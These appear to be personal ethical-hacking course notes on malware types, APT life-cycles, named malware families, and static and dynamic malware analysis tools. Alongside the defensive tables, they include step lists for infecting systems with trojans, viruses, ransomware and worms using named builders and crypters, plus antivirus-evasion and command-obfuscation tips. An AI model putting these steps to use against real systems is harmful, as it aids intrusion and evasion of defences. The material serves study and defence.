Malware components:

  • Crypter - to conceal existance of malware
  • Downloader - downloads other malware or malicious file
  • Dropper - covert carrier of malware
  • Exploit - part of malware that takes advantage of vuln or bug
  • Injector - injects exploits or malicious code available in malware into other processes
  • Obfuscator - conceals malicious code
  • Packer - compresses malware to convert the code into unreadable format
  • Payload - performs desired activity when activated
  • Malicious code- piece of code that defines basic functionality of the malware

Potentially unwanted applications PUAs

  • grayware/junkware
  • Advare
  • Torrent
  • Marketing
  • Cryptomining
  • Dialers

*Advanced Persistent threats:

Attacker remains undetected for long periods of time

Characteristics of APT: Objectives - repeatedly obtain infoemation Timeliness - time take from vuln to gain and maintain access Resources - amount of knowledge and tools required to perform attack. Risk tolerance - level to witch attacks remain undetetced Skills and methods - methods and tools used by attacker Actions - APT attacks follow certain number of actions Attack origination points - refrain to numerous attempts to gain entry Numbers involved in attack - number of host systems involved in the attack Knowledge source - gathering information online about specific threats Multi-phased - multiple phases of attack Tailored to vulnerabilities - ! Multiple points of entries - after initial entry multiple other are created Evasion of signature bases IDS’s - closely related to zero-days Specific warning signs - almost impossible to detect, usually just suspicious activities from users, file uploads etc. Highly targeted- not random, planned and executed against specific targets Long term engagement - Aim for long-term presence Advanced techniques - sophisticated malware, code detection, spear phishing, zero-days Complex command and control infrastructure

APT life-cycle:

  1. Preparation - defines target, research, team organization
  2. Initial intrusion - spear-phishing, running exploits
  3. Expansion - expanding access to targets network, admin and privilege escalation
  4. Persistence - maintaining access, evading IDS and firewalls.
  5. Search and ex-filtration - attacker achieves ultimate goal of network exploitation, steal all data etc. Destroy DLP
  6. Cleanup - covers tracks.

Trojans

Trojan - malicious or harmful code hidden in apparently harmless program or data Work same privilege level as user Indications of trojan - screen blinks, default wallpaper or settings change automatically Printers automatically start printing etc. (like 50 other things in ceh resource)

Ports used by trojans:

  • common and uncommon. Some use ports like 443 Types of trojans:

  • Remote access (RAT) - Remcos RAT spreading via virtual disk .vhd files

  • Backdoor trojans - can bypass IDS and firewalls, usually second or third point of entry. TinyTurla-NG (TTNG) operated by Turla APT group. Attackers utilize compromised WordPress-based websites as C2 endpoints.

  • Botnet trojans - used to infect large number of computers, connects to attacker using IRC channels, some have worm features. RDDoS is a botnet capable of executing commands and performing DDoS attacks.

  • Rootkit trojans - cannot be detected by observing services, usually part of blended attacks - dropper, loader and rootkit. Reptile rootkit

  • E-banking trojans - captures victims account information before bank encrypts it. TAN grabber- transaction authentication number, HTML injection (fake form field), Form grabber (POST requests), Covert credential grabber (silent until user performs online transaction)
    • e-banking trojan - CHAVECLOAK

  • Point-of-Sale Trojans - targets credit/depbit card readers. Prolex POS - braazilian, EMV cryptograms that allow attackers to use ghost transactions.

  • Defacement trojans - physically change underlying HTML format, Restorator - utility for editing windows resources.

  • Service protocol trojans - VNC, HTTP/HTTPS and ICMP. VNC trojans starts VNC daemon that is hidden, know financial malware use this - Vultur, Dridex and Gozi. HTTP/HTTPS trojans bypass firewalls and work in reverse, use port 80, poses as legitimate webshell, covers it in Base64. SHTTPD - small server that can be embedded in any program. Will listen to port 443. HTTP RAT uses port 80 to gain access/establish http tunnel. ICMP trojans use request and reply to carry payload.

  • Mobile trojans - target phones, Chameleon a banking trojan distributed by phishing pages, exploits Accessibility service privileges.

  • IoT trojans - leverage botnets to attack machines outside IoT network. OpenSSH trojan - install cryptomining trojan. Uses tampered version of OpenSSH.

  • Security Software disable trojans - stop the working of security programs such as firewalls to allow next stage of attack. Chameleon, CertLock, GhostLock

  • Destructive trojans -delete files on system

  • DDoS Trojans - systems stand by for command from server. Mirai IoT botnet trojan is still mosnt notorious DDoS trojans. Others RDDoS, Harabot, hailBot, kiraiBot, catDDoS

  • Command shell trojans - provides remote control of command shell on a victims maschine - netcat, DNS Messenger, GCat are some command shell trojans.

How to infect system using trojan:

  • Create new trojan packet using njRAT
  • Create a dropper or downloader - Amadey or SecuriDropper
  • Employ a wrapper such as IExpress wizard to bind Trojan to legitimate files for installation
  • Employ crypter such as Attack-Crypter to encrypt trojan and evade IDS, antivirus etc
  • Deploy trojan on victims machine by executing dropper or downloader software
  • Execute the damage routine

Creating a trojan:

  • njRAT - data stealing, camera access, keylogger etc, control botnets.
  • THorse
  • THOSE RAT
  • Trojan horse construction kit
  • Senna spy trojan generator
  • Umbra loader - botnet trojan maker
  • VenomRAT

Employing a dropper - used to camouflage malware payloads

  • Amadey, SecuriDropper, PindOS JavaScipt dropper, SharkBot, Dropper.AIF, NullMixer
  • Downloaders - new unknown downloader can bypass anti virus.
    • Fruity trojan downloader, Downloader.DN, InfoStealer.XY and sLoad

Employing a wrapper:

  • binds the trojan executable to with .exe applications that appear genuine. Installs trojan in background and runs application in foreground.
    • Convert wrapper programs - IExpress wizard, GULoader, RDP Wrapper, SystemBC, Trickbot, FinFisher

Employing a crypter - encrypts original binary code of .exe, used to hide viruses, spyware, keyloggers etc.

  • Attack-crypter, Muck crypter, Pure Crypter, DarkTortilla, Line Crypter, Trickbot/Conti

Propagating and deploying trojan - email, covert channels, proxy servers, usb/flash drives.

Evading antivirus software -

  • Break trojan in multipe pieces and zip them
  • embed into application
  • Change syntax - exe to VB script or ppt, doc, pdf
  • Change content using HEX editor
  • Change checksum and encrypt the file
  • Never use trojans downloaded from web
  • use binder and splitter that can change first few bytes of trojan programs

Exploit kits- uses security loopholes found in software applications such as Adobe reader and Adobe flash player.

  • BotenaGo - written on Go, contains over 30 variants of exploits and is capable of attacking millions of IoT and routing devices. Also called Mirai botnet.
    • Uses port 31412 by sending GET requests and listents to port 19412
    • no active communication with C2 during exploitation
    • Exploits based on exploitation function mapping
    • Exploits up to 33 vulnerabilities
    • Launches mirai malware on device trough links

Virus and worm concepts

Virus - self replicating program that produces code by attaching copies of itself. Affect variety of files .OVL, .EXE, .COM, .BAT

Characteristics of viruses:

  • infects other programs
  • Transforms itself
  • Encrypts itself
  • Alters data
  • Corrupts files and programs
  • Replicates itself

Why create a virus?

  • inflict damage on competitors
  • financial benefits
  • vandalize intellectual property
  • pranks
  • research
  • cyber-terrorism
  • political messages
  • damage network or computers
  • gain remote access

Indications of virus:

  • BSOD
  • missing files etc.
  • you’ll know :)

Stages of virus lifecycle:

  • Design - code or construction kits
  • Replication - replicates within system then spreads itself
  • Launch - activated when user performs specific actions

Working of viruses:

  • Infection phase
    • Method of infection
    • Method of spreading A virus infects system in sequence:
  • loads itself into memory
  • appends malicious code to legitimate program
  • user launches program
  • execution affects other programs in the system
  • Cycle continues until user realizes anomaly in system
  • boot sector viruses execute code before PC is booted Methods virus spreads:
  • files
  • file sharing
  • usb and other sotrage media
  • malicious donwloads, attachments

Attack phase:

  • Delete files and alter content of data
  • Perform tasks not related to applicaitons
  • execute uppon triggering specific event
  • some execute via built bug programs stored in memory
  • advanced viruses only after spreading trough host

Types of viruses:

  • Boot sector virus - master boot record and DOS boot record, OS executes code while booting
  • File viruses - in files
  • Multipartite viruses - combines file infections and boot record infectors
  • Macro viruses - word or similar applications, most are written in VBA, usually spread via email
  • Cluster viruses - dont spread or plant additional files. DIR-2
  • Stealth viruses - Try to hide from antivirus program by interrupting service calls. One of carries is rootkit.
  • Encryption viruses - cryptolockers, via freeware or shareware, employ XOR on each byte with randomized key. Encryption virus block acces to machine or provide limited use.
  • Sparse infector virus - replicates occasionally (every tenth execution), determines which file to infect.
  • Polymorphic viruses - change their code to avoid detection, but save same functionality.
  • Metamorphic virus - rewrite themselves completely each time they infect new file to avoid pattern recognition
  • Overwriting file or cavity viruses - overwrite part of host file with constant (usually nuuls). Maintaining constant file size allows to avoid detection.
  • Companion/Camouflage viruses - Stores itself with same filename as the target program.
  • Shell viruses - forms a shell aroundthe target host making itself original program with host code as sub-routine
  • File extension Viruses - badfile.txt.vbf etc.
  • FAT viruses - attacks file allocation table FAT
  • Logic bomb viruses - triggered to a response to an event or time/date
  • Web scripting viruses - breaches web browser security trough a website. Prevention - Safely validating untrusted HTML inputs.
  • E-mail viruses - attachments
  • Armored viruses - shows other location to antivirus, anti-disassembly, anti-debugging, Anti-heuristics, anti-emulation, anti-goat.
  • Add-on viruses - append code without making any changes
  • Intrusive viruses - overwrite code completely
  • Direct action or transient viruses - transfer all code to host code in memory
  • Terminate and stay resident viruses (TSR) - remains permanently in targets machine.

How to infect machine using a virus -

  1. create a virus using JPS virus maker, Virus maker, Virus-builder.
  2. Pack it with binder or virus packager tool
  3. Send to victims machine. TeraBIT virus maker, Batch virus generator

Virus hoaxes - false alarms claiming to be real viruses Fake antivirus - Antivirus 10, AVLAb internet security, Smart security, PC analyzer Tool, Live protection Suite

Ransomware

Ransomware families:

  • Phobos
  • Xorist
  • LockBit Black
  • Darkside RaaS
  • Conti
  • Cerber
  • Thanos
  • RansomEXX
  • NETWALKER
  • QNAPCrypt

Ransomware examples -

  • Mallox ransomware - targets MS windows systems - MS-SQL servers, appends files .mallox, creates ransom note called recovery information.txt
  • STOP/Djvu Ransomware - evolved to over 600 variants. Adds .Djvu extension witch is legitimate extension used by At&t.Uses RSA encryption How to infect system using ransomware -
    1. Chaos ransomware builder v4.
    2. Transfer to victims machine
    3. Ransomware encrypts victims machine
    4. window appears with ransom instructions

Computer worms

Spread, replicate and execute on their own:

  • SSH-Snake
  • Raspberry Robin
  • P2PInfect

How to infect system using worm:

  • Create with tools such as internet worm maker thing, batch worm generator.
  • Deploy worm via phishing emails, malicious websites, network shares or infected USB drives. Use crypters such as BitCrypter, H-Crypt, encrypt worm to evade detection.
  • Worm infects system by executing its payload
  • Worm scans other vulnerable devices
  • Copies itself to other machines and propagates
  • Installs backdoors or alters system settings and steals data from infected devices

Worm makers-

  • Internet worm thing, open source tool
  • Batch worm generator

Fileless malware concepts

Also called non-malware, infect legitimate software and applications, leverages existing vulnerabilities to infect system. Generally resides in RAM. Usually injects code in JS, MS word, Adobe pdf reader, PowerShell, .NET, malicious macros and windows management instrumentation WMI

Reasons to use:

  • stealth - really difficult to detect
  • LOL (living off the land) - system tools exploited by fileless malware installed on system by default. No need for custom tool installation
  • Thrustworthy - Most frequently used and trusted tools.
  • Persistence without files - Fileless malware can achieve persistance by inserting code in registry or scheduling tasks.
  • Simplifying the infection process - begin with simple phishing email leading to website that execute code directly into memory
  • Increased success rate in targeted attacks
  • Complicated forensic analysis - hard to develop indicators of compromise (IoCs)

Techniques used by attackers:

  • Phishing
  • Legit applications
  • Native applications
  • Trough lateral movement
  • Malicious websites
  • Registry manipulation
  • Memory code injection
  • Script-based injection
  • Reflective DLL injection
  • Exploiting non-malicious files

Categorization by how much evidence is left in machine:

  • Type 1: No file activity performed - never requires writing file on disk. Example - infecting by sending malicious packets that exploit vulnerability.
  • Type 2: Indirect file activity - achieves fileless presence using files, injecting malicious powershell command into the WMI repository
  • Type 3: Required file to operate - requires files to operate, but does not execute attacks from those files directly.

Categorization by point of entry:

  • Exploits can be either file-based or network based. File-based exploits system executable - flash, java, documents etc. to run shell code and inject payload into the memory
  • Hardware - Device based malware infects firmware residing on network cards or hard drives to deliver malicious payload.
  • Execution and injection - can be file-based, macro-based, disk-based. Inject code into process memory or other legitimate running processes.

Point of entry:

  • memory exploits
  • website
  • email, documents

Eternal-blue: memory exploit that leverages flaws in windows file sharing protocol (SMB), allows to read access services applications etc. Then targets the local security authority subsystem service lsass.exe - mimikatz

Popular fileless malware -

  • LODEINFO - starts with phishing emails with MS word documents, triggers VBA script to launch shellcode capable of LODEINFO implant. Masquerades as privacy-enhanced mail (PEM) from C2 server which in turn loads backdoor direcly into memory.
  • Fileless revenge RAt
  • Divergent
  • DarkWatchman
  • HeadCrab 2.0
  • BazarBackdoor
  • Nodersok
  • Vaporworm
  • Sodinokibi Ransomware
  • Kovter and Poweliks
  • Dridex
  • Sorebrect Ranswomware

Fileless malware obfuscation methods to avoid antivirus

  • Inserting characters such as commas and semicolons (whitespace characters)
  • Inserting parentheses
  • Inserting Caret Symbol ^^
  • Inserting double quotes
  • Using custom environment variables
  • Using pre-assigned environment variables

AI based malware concepts

Autonomous

  • Infiltration - same as other malware

NAtural language prosessing (NLP) in AI based malware - sophisticated phishing attacks, context aware malware, automated social enigeering, sentiment analysis targeting, evasion tech

Generative Adversial networks (GANs)

AI based malware - FakeGPT, uses chrome extension that mimics chatGPT

WormGPT - generate humal like responses for emails etc. FraudGPT - similar, can create cracking tools

BlackMamba - AI generated polymoprhic malware, leverages LLM

Malware analysis

Sheep Dip: analysis of suspicious files, messages etc.

Static analysis:

  • Code analysis - involves going trough executable or binary code
    • File fingerprinting - HashMyFiles
    • Local and online Malware scanning - VirusTotal, Hybrid analysis
    • Performing strings search - analyze embedded strings - BinText, FLOSS, Strings, Free EXE DLL resource extract, FileSeek, Hex workshop
    • Identifying packing/obfuscation methods - PEid, Detect it Easy (DIE)
    • finding portable executables (PE) - PEExplorer, used on Windows, PE contains .text, .rdata, .data. rsrc
    • Identifying file dependencies - check dynamically linked list in malware executable file - Dependency-check, DependencyFinder, Dependency walker- lists all the dependent modules
    • Disassembly - disassemble binary code to analyze assembly code instructions - IDA, OllyDbg, Ghidra, x64dbg, Radare2, OllyDbg, WinDbg, IDA pro
    • Analyzing ELF executable files - readelf
    • Analyzing match object (Mach-O) executable files, associated with macOS and ios -lief, otool,hopper dissasembler
    • Analyzing malicous MS office documents - OLE2 files, oleid tool, identifying suspicious VBA keywords. !!! - good iedea for work
    • Finding macro streams -
    • Analyzing suspicous PDf document - PDFiD, PDFStream dumper
    • Analyzing suspicious documents using YARA - for malware samples,
Area Goal What to Look For Tools / Commands
Code / Binary analysis Understand what the executable is and what it likely does without running it File type, architecture, compiler hints, stripped symbols, suspicious sections file (Linux), PE Explorer / CFF Explorer (Windows), Hex Workshop
File fingerprinting Create stable identifiers (IOCs) for tracking & correlation MD5/SHA1/SHA256 hashes; compare with known samples HashMyFiles; sha256sum (Linux)
Local & online malware scanning Quick triage using multiple engines / sandboxes Detection names, behavioral tags, contacted domains, dropped files VirusTotal; Hybrid Analysis
Strings search Extract embedded text to find IOCs & intent URLs, IPs, commands, file paths, mutex names, registry paths, PowerShell, user-agent strings FLOSS; strings; BinText; FileSeek; Free EXE/DLL Resource Extract; Hex Workshop
Packing / obfuscation detection Detect if code is compressed/encrypted/hidden High entropy, tiny import table, unusual sections, UPX markers PEiD; Detect It Easy (DIE)
PE discovery & PE structure (Windows) Identify Windows executables & key sections PE sections: .text (code), .rdata (read-only), .data (globals), .rsrc (resources) PE Explorer (Windows)
Dependency analysis (imports) See what libraries/APIs the binary relies on Suspicious imports: networking, process injection, crypto, persistence Dependency Walker; DependencyFinder; Dependency-Check
Disassembly (static reversing) Convert machine code to assembly/pseudocode to understand logic C2 logic, encryption routines, persistence, privilege escalation, anti-analysis Ghidra; IDA / IDA Pro; x64dbg; OllyDbg; WinDbg; Radare2
ELF analysis (Linux) Inspect Linux malware binaries Entry point, segments, dynamic linker, imports, RWX segments readelf; objdump; nm; ldd; checksec
Mach-O analysis (macOS/iOS) Inspect Apple binaries Load commands, embedded libs, entitlements, suspicious dylibs otool; LIEF; Hopper Disassembler
Malicious MS Office docs (OLE2) Detect macro-based malware & embedded objects Auto-exec macros, suspicious VBA keywords, embedded payloads oleid; (enrich) olevba; oledump
Macro streams Extract and review macro code streams VBA streams, AutoOpen/Document_Open, shell calls oledump; olevba
Suspicious PDF analysis Identify malicious PDF objects/scripts /JavaScript, /OpenAction, suspicious streams PDFiD; PDF Stream Dumper
YARA scanning (docs & binaries) Match known malware families/patterns Rule hits, family classification, packer IDs YARA (local rules + community rulesets)

Dynamic analysis - behavioral analysis, executing malware

  • System baselining - capturing system state (taking snapshot)
  • Host integrity monitoring - study changes
    • Port monitoring - netstat and TCP view
    • netstat commands:
      • -a all active TCP communications
      • -e Displays ethernet statistics
      • -n active TCP connections
      • -0 :active connections and PID
      • -p: protocol - shows connections for protocol.
      • -s: Displays statistics by protocol.
      • -r: Displays contents for ip routing table
    • process monitoring - Process explorer, OpMAnager
    • registry monitoring - Run, RunServices, RunOnce, RunServicesOnce, jv16 PowerTools
    • windows services - malware sometimes renames services, Netwrix, AnVir Task manager
    • startup apps - WinPAtrol
    • Event logs - Splunk siem
    • Monitoring - mirekusoft install monitor
    • files and folders - PA file sight
    • Device drivers monitoring - msinfo32, DriverView
    • Network traffic monitoring/analysis - SolarWinds netflow, capsa
    • dns resolution - DNSChanger, DNSquery sniffer
    • API calls monitoring - API monitor
    • System calls monitor - strace
    • scheduled tasks monitoring - time or action based, logic bombs - schtasks, AdAudit Plus
    • Browser activity monitoring - wireshark 443, 80, 8080 to check if anything is connectiing to c2
Area Goal What to Look For Tools / Commands
System baselining Capture “known-good” state before execution Snapshot/restore points, baseline processes/services/files VM snapshots (VirtualBox/VMware); (enrich) Regshot for registry baseline
Host integrity monitoring Detect system changes caused by malware New/changed files, registry keys, services, tasks, drivers Install Monitor tools; Sysmon/SIEM (if available)
Port / connection monitoring Identify active connections and potential C2 Unknown outbound connections, unusual ports, frequent beacons netstat; TCPView
netstat: -a Show all connections and listening ports Hidden listeners, unexpected services netstat -a
netstat: -e Ethernet statistics Anomalous traffic volume netstat -e
netstat: -n Numeric addresses (no DNS resolve) Quick IP review (faster, cleaner) netstat -n
netstat: -o Show PID owning the connection Map network activity → process netstat -o
netstat: -p Filter by protocol TCP vs UDP focus netstat -p tcp (example)
netstat: -s Protocol statistics Spikes in errors/retransmits netstat -s
netstat: -r Routing table Suspicious route changes netstat -r
Process monitoring Track spawned/injected processes Unusual parent-child chains, LOLBins, unsigned processes Process Explorer; OpManager
Registry monitoring (persistence) Detect autoruns & persistence changes Run/RunOnce keys; Services keys; unusual new entries jv16 PowerTools; (enrich) Autoruns; Regshot
Windows services monitoring Spot new/renamed services Random names, hidden services, changed service paths Netwrix; AnVir Task Manager
Startup apps monitoring Detect persistence via startup entries Unexpected startup items WinPatrol
Event log monitoring Observe security/system events during execution Service creation, task creation, log clearing Splunk SIEM (or Windows Event Viewer)
Install/changes monitoring Track installer-like behavior & system modifications Dropped files, added registry keys, created services Mirekusoft Install Monitor
File/folder monitoring Detect file writes & drops AppData/Temp drops, staging folders, encryption activity PA File Sight
Driver monitoring Detect kernel-level components New drivers, unsigned drivers msinfo32; DriverView
Network traffic analysis Deep inspection of traffic content/flows DNS beacons, HTTP/S C2, strange TLS, payload downloads SolarWinds NetFlow; Capsa; (enrich) Wireshark
DNS resolution monitoring Identify domains queried during execution DGA-like domains, frequent lookups, new domains DNSQuerySniffer; DNSChanger
API calls monitoring (Windows) Observe Windows API usage for behavior mapping CreateRemoteThread, VirtualAlloc, WinInet, registry APIs API Monitor
System call monitoring (Linux) Trace OS calls for Linux malware File/exec/network syscalls strace
Scheduled tasks monitoring Detect time-based persistence/logic bombs New tasks, odd triggers, hidden tasks schtasks; ADAudit Plus
Browser / web activity monitoring Check common C2 ports & web beacons 80/443/8080 traffic to unknown hosts Wireshark filtering ports 80,443,8080

Virus detection methods:

  • scanning - yes
  • integrity checking
  • interception - deflect and flag logic bombs and trojans
  • Code emulation
  • Heuristic analysis - SCEMU

Malware code instrumentation inserting additional code within binary code - HawkEye

Trojan analysis - Coyote

  • initial access
  • deployment and infection
  • exploitation
  • persitance
  • c2

Virus analysis: GhostLocker 2.0o

Fileless malware analysis: PyLoose